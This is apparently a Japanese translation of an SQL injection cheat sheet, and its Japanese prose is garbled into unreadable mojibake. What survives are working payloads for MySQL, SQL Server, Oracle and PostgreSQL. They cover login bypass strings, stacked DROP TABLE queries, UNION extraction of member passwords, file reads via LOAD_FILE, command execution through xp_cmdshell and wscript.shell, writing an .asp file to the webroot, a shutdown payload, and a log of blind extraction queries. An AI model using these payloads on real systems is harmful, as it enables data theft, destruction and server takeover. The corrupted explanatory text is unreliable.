�n�b�J�[�W���p��2007�N5�����@���W�P�@Web�A�v���U���̋��ȏ� ���
�E�����ւ̃����N�@SQL
Injection Cheat Sheet
�E�n�b�J�[�W���p��2007�N5�����̏Љ�
SQL Injection Cheat Sheet, Document Version 1.1
���݂̃o�[�W�����́AMySQL�AMicrosoft
SQL Server����шꕔ��ORACLE�APostgreSQL�݂̂ɑΉ����Ă���B�唼�̃T���v���͌X�̏Ŏg�p�ł���킯�ł͂Ȃ��B���ʂ�R�[�h�x�[�X�̈Ⴂ�A�\���ł��Ȃ��ς����SQL���Ȃǂ̂��߁A���ۂ̊��͂���ƈقȂ�ꍇ������B
�T���v���ł́A�\�ȍU���̊�{�I�ȃA�C�f�B�A�������Ă���B�قƂ�ǂ̃Z�N�V�����ł́A���̃Z�N�V�����Ɋւ���ȒP�ȏ����q�ׂĂ���B
| M : | MySQL |
| S : | SQL Server |
| P : | PostgreSQL |
| O : | Oracle |
| + : | �����炭���̃f�[�^�x�[�X���ׂ� |
�N�G���̎c�蕔�����R�����g�A�E�g����B
1�s�R�����g�́A�N�G���̎c�蕔�������邽�߂Ɏg�p�����ł���ʓI�Ȏ�@�ł���B�R�����g�A�E�g���邱�ƂŁA�\��������������K�v���Ȃ��Ȃ�B
-- (SM)
DROP sampletable;--
# (M)
DROP sampletable;# admin'-- SELECT * FROM members WHERE username = 'admin'--' AND password
= 'password'
SQL����--�ȍ~�͖�������邽�߁Aadmin���[�U�[�Ƃ��Ẵ��O�C�����s���B�C�����C���R�����g��SQL�����I���������Ɉȍ~�̃N�G�����R�����g�A�E�g�����B����́A�u���b�N���X�g���o�C�p�X������A�X�y�[�X���폜������ASQL���ǂ��ɂ���������A�f�[�^�x�[�X�̃o�[�W�������m�F�����肷�邽�߂Ɏg�p�����B
/*Comment Here*/ (SM)
DROP/*comment*/sampletableDR/**/OP/*bypass blacklisting*/sampletableSELECT/*avoid-spaces*/password/**/FROM/**/Members/*! MYSQL Special SQL */ (M)SELECT /*!32302 1/0, */ 1 FROM tablename10; DROP TABLE members /*SELECT /*!32302 1/0, */ 1 FROM tablename/*!32302 10*/ 10SELECT /*!32302 1/0, */ 1 FROM tablename1��̃g�����U�N�V�����ŕ����̃N�G�������s�������B����́A�S�ẴC���W�F�N�V�����\�ȉӏ��łƂĂ����ʓI���B�o�b�N�G���h��SQL Server�𗘗p���Ă���A�v���P�[�V�����ɑ��ẮA���ɗL�����B
; (S)SELECT * FROM members; DROP members--SQL�N�G�����I�����A�ʂ̃N�G�����J�n����B
�F�T�|�[�g�A �ÊD�F�F�T�|�[�g���Ă��Ȃ��A���D�F�F�s��
| SQL Server | MySQL | PostgreSQL | ORACLE | MS Access | |
| ASP | |||||
| ASP.NET | |||||
| PHP | |||||
| Java |
MySQL��PHP�ɂ���
��̖��𖾂炩�ɂ��Ă������B
PHP�|MySQL�̑g�ݍ��킹�ł́A�����̓T�|�[�g����Ă��Ȃ��BJava�͕������T�|�[�g���Ă��Ȃ��iORACLE�ɂ��Ă͊m�������A���̃f�[�^�x�[�X�Ɋւ��Ă͊m��ł͂Ȃ��j�B�ʏ�AMySQL�͕������T�|�[�g���Ă���B�������A�f�[�^�x�[�X���C���[���̐ݒ�̂��߁APHP-MySQL�A�v���P�[�V�����ł�2�Ԗڂ̃N�G�������s���邱�Ƃ��ł��Ȃ��BMySQL�N���C�A���g�͕������T�|�[�g���Ă���̂�������Ȃ����A�m�M�͂Ȃ��B�N���𖾂��ė~�����B
10;DROP members -- SELECT * FROM products WHERE id = 10; DROP members--
����́A�ʏ�̃N�G�������s�������DROP members�Ƃ���SQL�������s�����B
If���ߕ��Ɋ�Â������X�|���X�̎擾�B����́A�u���C���hSQL�C���W�F�N�V�����̃L�[�|�C���g��1���ł���A�ӖړI�������m���P���ȏ��������e�X�g���邽�߂ɂ��𗧂B
IF(condition,true-part,false-part)
(M)
SELECT IF(1=1,'true','false')IF condition true-part
ELSE false-part (S)IF (1=1) SELECT 'true' ELSE SELECT 'false'if ((select user) = 'sa' OR (select user) = 'dbo')
select 1 else select 1/0 (S)
sa��dbo�ȊO�̃��[�U�[�����O�C�����Ă���ꍇ�A0���Z�G���[����������B
magic_quotes()��ގ������t�B���^�[�AWeb�A�v���P�[�V�����t�@�C�A�E�H�[�����o�C�p�X���邽�߂ɖ𗧂B
0xHEXNUMBER (SM)SELECT CHAR(0x66) (S)SELECT 0x5045 (���̏ꍇ�́A���l�ł͂Ȃ�16�i�R�[�h����ɕϊ����ė��p�����B)
(M)SELECT 0x50 + 0x45 (���̏ꍇ�͐��l�ƂȂ�B) (M)������֘A����B�����̓N�H�[�g���g�p�����C���W�F�N�V������g�ݗ��Ă���A�u���b�N���X�g���o�C�p�X������A�o�b�N�G���h�̃f�[�^�x�[�X�ʂ����肷��̂ɂ��Ȃ�L���ł���B
+ (S)SELECT login + '-' + password FROM members|| (*MO)SELECT login || '-' || password FROM members MySQL��"||"�ɂ���
ANSI���[�h�ʼnғ�����MySQL�ł͐���ɓ��삷�邪�A���̃��[�h�ł���Θ_�����Z�q�Ƃ��ĉ��߂����0���Ԃ����B���悢���@�́AMySQL��CONCAT()���̗��p�ł���B
CONCAT(str1, str2, str3, ...) (M)SELECT CONCAT(login, password) FROM members ������𗘗p���钼�ړI�ȕ��@�͂��������邪�ACHAR()�iMS�j��CONCAT()�iM�j�ɂ��N�H�[�g���g�p���Ȃ�������̐����͏�ɉ\���B
0x457578 (M) - �������16�i���\��SELECT 0x457578 SELECT CONCAT('0x',HEX('c:\\boot.ini'))CONCAT()���g��SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M) ASCII() (SMP) SELECT ASCII('a')CHAR() (SM) SELECT CHAR(64)UNION���g�p���邱�Ƃŕʂ̃e�[�u���ɑ���SQL�N�G�������s���邱�Ƃ��ł���B�܂�A���̃e�[�u�����烌�R�[�h���擾����悤�A�N�G����"�d����"���Ƃ��\���B
SELECT header, txt FROM news UNION ALL SELECT
name, pass FROM members
����́Anews�e�[�u����members�e�[�u���̌������ʂ��������Ă��ׂẴf�[�^��Ԃ��B
Union Injection�ōU�����A���Ƃ��ĈقȂ錾��ݒ�i�e�[�u���ݒ�A��ݒ�A�e�[�u����DB�̐ݒ�̑g�ݍ��킹�Ȃ��j�ɂ��G���[���������邱�Ƃ�����B�ȉ��ɐ�������@�\�́A���̌���ݒ����������邽�߂ɂ��Ȃ�L���Ȏ�i�ł���B����͋H�Ȗ��ł͂��邪�A���{��A���V�A��A�g���R��Ȃǂ̃A�v���P�[�V�����𗘗p���Ă���ꍇ�A�N����\��������B
COLLATE SQL_Latin1_General_Cp1254_CS_AS�t�B�[���h�����̗L���ȃt�B�[���h���g�p����BSQL
Server�h�L�������g���Q�Ƃ��Ċm�F���邱�ƁBSELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS
FROM membersHex()���g�p����Badmin' -- admin' # admin'/*' or 1=1--' or 1=1#' or 1=1/*') or '1'='1--') or ('1'='1--' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--*MySQL�̌Â��o�[�W�����ł�UNION�̃N�G�����T�|�[�g���Ă��Ȃ��B
�ȉ��̏����Ŏ��s����B
HAVING 1=1 -- ' GROUP BY table.columnfromerror1
HAVING 1=1 -- ' GROUP BY table.columnfromerror1, columnfromerror2
HAVING 1=1 --' GROUP BY table.columnfromerror1, columnfromerror2,
columnfromerror(n) HAVING 1=1 -- and so on ORDER BY�𗘗p������ԍ��̊m�F�ŁAUNION SQL�C���W�F�N�V�����̃v���Z�X���X�s�[�h�A�b�v�ł���B
ORDER BY 1-- ORDER BY 2--ORDER BY N-- so on ' union select sum(columntofind)
from users-- (S) Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate
operation cannot take a varchar data type
as an argument.SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT
null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULl, NULL--11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE
1=2 –-11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2
–- Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not
allowed.Union�̃^�[�Q�b�g�ŃG���[�ɂȂ�O��convert()���G���[��Ԃ����낤�B���̏ꍇ�Aconvert()����Ώ����悤�B
'; insert into users values( 666, 'attacker', 'foobar', 0xffff
)--
@@version (MS)
SQL�T�[�o�̃f�[�^�x�[�X�o�[�W�����Əڍׂȃo�[�W���������擾����B�o�[�W�������Ƃ̕ύX�͂Ȃ��B���̗�Ɠ��l��select���邾���ł悭�A�e�[�u�����̎w��͕s�v�Binsert���Aupdate��������ł��g�p�\�B
INSERT INTO members(id, user, pass) VALUES(1,
''+SUBSTRING(@@version,1,10) ,10)
�t�@�C���̃R���e���c���e�[�u�����ɓǂݍ��ށBWeb�A�v���P�[�V���������삷��T�[�o�[�����̃t�H���_�\����m��Ȃ���AIIS���^�x�[�X�t�@�C���i%systemroot%\system32\inetsrv\MetaBase.xml�j��ǂݍ����A���^�x�[�X�t�@�C������A�v���P�[�V���������݂���t�H���_��T�����Ƃ��\���iIIS6�̂��j�B
�e�L�X�g�t�@�C���փf�[�^���o�͂���B���̋@�\�𗘗p����ɂ̓��O�C���������K�v�ƂȂ�B
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp
-c -Slocalhost -Usa -Pfoobar
ActiveX���T�|�[�g���Ă��邽��SQL Server�ł�VBS��WSH�X�N���v�g�����p�\�B
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell',
@o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
�悭�m��ꂽ���Z�ŁASQL Server2005�ł̓f�t�H���g�Ŗ����ɂ���Ă���B���p���邽�߂ɂ͊Ǘ��Ҍ������K�v�ƂȂ�B
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
�P��ping�`�F�b�N����i��������s�ł���悤�Ɏ����̃t�@�C�A�E�H�[����X�j�b�t�@�[��ݒ肵�Ă����j�B
EXEC master.dbo.xp_cmdshell 'ping <ip address>'
�G���[�AUNION�A���̑��̕��@�𗘗p���Č��ʂړǂݏo�����Ƃ͂ł��Ȃ��B
master..sysmessages master..sysservers masters..sysxloginssys.sql_logins
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell
'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
SQL Server�ł�Insert�N�G����select�T�u�N�G�����g�p�s�\�B
SELECT id, product FROM test.test t LIMIT 0,0
UNION ALL SELECT 1,'x'/*,10 ;
LIMIT���2�Ԗڂ̈����ŃC���W�F�N�V�����\�ȏꍇ�A�R�����g�A�E�g������UNION�C���W�F�N�V�����̒��Ɋ܂߂��肷�邷�邱�Ƃ��\�B
���Ȃ����{���ɐ����Ă��܂������A';shutdown --�Ƃ���V���b�g�_�E������B
SELECT name FROM sysobjects WHERE xtype = 'U'
SELECT name FROM syscolumns WHERE id =(SELECT
id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
NOT IN��NOT
EXIST���g�p����B ... WHERE users NOT IN ('First User', 'Second User')SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT
TOP 0 name FROM members) -- very good one SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from
(SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id)
AS x, name from sysobjects o) as p where p.x=3) as int
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects
i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE
o.xtype = 'U') as p where p.x=21
';BEGIN DECLARE @rt varchar(8000) SET @rd=':'
SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects
WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP
end;--
�ڍL���FFast
way to extract data from Error Based SQL Injections
��ʓI�ɔ��ɗD�ꂽ�A�v���P�[�V�������y�[�W��ɃG���[���b�Z�[�W��\�����邱�Ƃ͂Ȃ��̂ŁAUNION�A�^�b�N��G���[�x�[�X�̃A�^�b�N��@�𗘗p���ăf�[�^�𒊏o���邱�Ƃ͂ł��Ȃ��B�f�[�^�𒊏o����ɂ̓u���C���hSQL�C���W�F�N�V�����U���𗘗p���ׂ��ł���B�u���C���hSQL�C���W�F�N�V�����ɂ�2��ނ̃p�^�[��������B
�ʏ�̃u���C���h�F�x�[�W��Ƀ��X�|���X���\������邱�Ƃ͂Ȃ���HTTP�X�e�[�^�X�R�[�h��N�G���̃��X�|���X���ʂ���f���邱�Ƃ��ł���B
���S�ȃu���C���h�F�����Ȃ��ނ̏o�͂ɂ����Ă��S�����ق������Ȃ����Ƃ��w���B����́A���O�@�\�⎗���悤�ȋ@�\�ł��蓾��C���W�F�N�V�����ł���B�������A����͈�ʓI�ł͂Ȃ��B
�ʏ�̃u���C���h�ł�if�X�e�[�g�����g��WHERE��̃N�G�������p���ẴC���W�F�N�V�������\�i��ʓI�ɔ�r�I�e���j�����A���S�ȃu���C���h�ł�wait�@�\�̗ނ�X�|���X�^�C���̕��͂𗘗p����K�v������B���̂��߂ɂ́ASQL Server�ł�WAIT FOR DELAY '0:0:10'�AMySQL�ł�BENCHMARK()�APostgreSQL�ł�pg_sleep(10)�AORACLE�ł͂�������PL/SQL�g���b�N���g�����Ƃ��ł���B
�ȉ��̏o�͂́A���ۂɌl�I�Ɏg�p���Ă���u���C���hSQL�C���W�F�N�V�����c�[���ŁASQL Server���o�b�N�G���h�Ɏg�p����A�v���P�[�V�����ւ̍U������уe�[�u�����̊���o�������s�������̂��B����͍ŏ��̃e�[�u�����̍ŏ��̕���������o�����߂̃��N�G�X�g�ł���B�������f�������s���Ă��邽�߁ASQL�N�G���͂�蕡�G�ɂȂ��Ă���B�T���A���S���Y�����g�p���ĕ����̃A�X�L�[�R�[�h��������s���Ă���B
�e�s�̐擪��TRUE��FALSE�́A�N�G�����^��Ԃ������U��Ԃ������������Ă���B
TRUE : SELECT ID, Username, Email
FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM
sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects
WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID
= 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID =
1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID
= 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID =
1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID
= 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID =
1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID
= 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID
= 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE
xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
�Ō��2�̃N�G���������Ƃ�FALSE��Ԃ��Ă��邽�߁A�e�[�u�������ŏ��̕������A�X�L�[�R�[�h80�ԁi10�i���j�A�܂�'P'�ł������Ƃ�����ł���B���ꂪ�T���A���S���Y�����g�p�����u���C���hSQL�C���W�F�N�V�����̍U����@�ł���B�悭�m��ꂽ���̕��@��1�����ԂɃ`�F�b�N���Ă������@�ł���B���ꂼ��A�قȂ�ł̌��ʂ����҂ł���B
�܂��A���S�ȃu���C���h�ł��������g�p����B����ȊO�̏ꍇ�́A�P��0���Z�G���[����������@�ŏ�Ԃ̍��قf����B���ɁA2�`30�b�ȏォ���邱�Ƃɒ��ӂ��K�v���B�f�[�^�x�[�XAPI�ɂ��ڑ���X�N���v�g�Ń^�C���A�E�g����������\��������B
�����sleep�Ɠ��l�A�w�肵�����Ԃ̏�����҂����邱�Ƃ��ł���B�f�[�^�x�[�X�̑҂����Ԃ����o��CPU�Z�[�t�ȕ��@�ł���B
WAITFOR DELAY '0:0:10'--
�ȉ��̗l��1�b�ȉ��̒Z���Ԃ̎w������邱�Ƃ��\�B
WAITFOR DELAY '0:0:0.51'
if (select user) = 'sa' waitfor delay '0:0:10' ��{�I�ɁAMySQL��Z���ԑ҂����邽�߂Ɉȉ��̃R�}���h�����p���Ă���BWeb�T�[�o�̏����\�͂�Z���ԂŌ��E�܂ŏ���邱�Ƃɒ��ӂ��邱�ƁB
BENCHMARK(howmanytimes, do this)
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))IF (SELECT * FROM login) BENCHMARK(1000000000,MD5(1))�w�肵���b��sleep����B
SELECT pg_sleep(10); �Z�L�����e�B�̊W��ASQL Server��sp_password�Ɋ܂܂��N�G���ɂ��Ă̓��O���̎悵�Ȃ��B�܂�Asp_password�𑗐M����N�G���ɒlj������ꍇ�A���̃N�G����SQL Server�̃��O�ɋL�q����Ȃ��i���RWeb�T�[�o�[�̃��O�ɂ͋L�^�����\��������B�\�ł����POST���\�b�h���g�p���邱���j�B
�ȉ��́A�u���C���hSQL�C���W�F�N�V�����ƃT�C�����g�A�^�b�N�����{���邽�߂́A�V���v���ŗǂ��e�X�g�ł���B
product.asp?id=4 (SMO) product.asp?id=5-1product.asp?id=4 OR 1=1
product.asp?name=Bookproduct.asp?name=Bo’+’okproduct.asp?name=Bo’ || ’ok (OM)product.asp?name=Book’ OR ‘x’=’xSELECT User,Password FROM mysql.user;SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = ‘root’;SELECT ... INTO DUMPFILEcreate function LockWorkStation��'user32'��.so�t�@�C������integer�ŕԂ��Bselect LockWorkStation();
create function ExitProcess��'kernel32'��.so�t�@�C������integer�ŕԂ��Bselect exitprocess();SELECT USER();SELECT password,USER() FROM mysql.user;SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE
user_group = 1;query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;select benchmark( 500000, sha1( 'test' ) );query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')),
'false' );
�f�[�^�̊���o���A�u���[�g�t�H�[�X�ɂ�鐄���B
select if( (ascii(substring(user(),1,1)) >>
7) & 1, benchmark(100000,sha1('test')), 'false' );MD5()
SHA1()
CHAR()
PASSWORD()
ENCODE()
COMPRESS()
BENCHMARK()
ROW_COUNT()
SCHEMA()
VERSION()
��{�I�ɁASQL�C���W�F�N�V�������ǂ����Ɏd����ŁA���ꂪ���̓���Ńt�B���^�[����Ȃ����Ƃ����҂ł���B����́A��ʓI��hidden���C���[�̖��ł���B
Name : ' + (SELECT TOP 1 password FROM users
) + '
Email : xx@xx.com
�����A�v���P�[�V���������S�ł͂Ȃ��X�g�A�h�v���V�[�W���A���A�����Ȃǂ�name�t�B�[���h�̃f�[�^�𗘗p���Ă����ꍇ�Ausers�e�[�u���̍ŏ��̃��[�U�̃p�X���[�h�����[���̈��於�Ȃǂɑ}������邩������Ȃ��B
�����̊o�����́A�������N����̃T�C�g������W������l�I�Ȍo�����瓾��ꂽ�肵�����Ƃł���B�Ȃ̂ŎQ�Ɛ悪��������Ă��邩������Ȃ��B�����A�Q�Ɛ悪�����Ă���̂ł͂Ǝv�����Ƃ��͎������[���𓊂��Ē�������iferruh-at-mavituna.com�j�A�\�Ȍ��葁���X�V������肾�B
Oracle�APostgreSQL�ADB2�AMS Access�Ɋւ���o��������A���݂����ɋL�ڂ��Ă��Ȃ����Z�̊������������B�\�Ȍ���͂₭Web�Ɍf�ڂ������Ǝv���Ă���B�����A�V�������Z�������������`�������Ƃ��́A�����ɃR�����g�������̂ł͂Ȃ��������[�����Ăق����iferruh-at-mavituna.com�j�B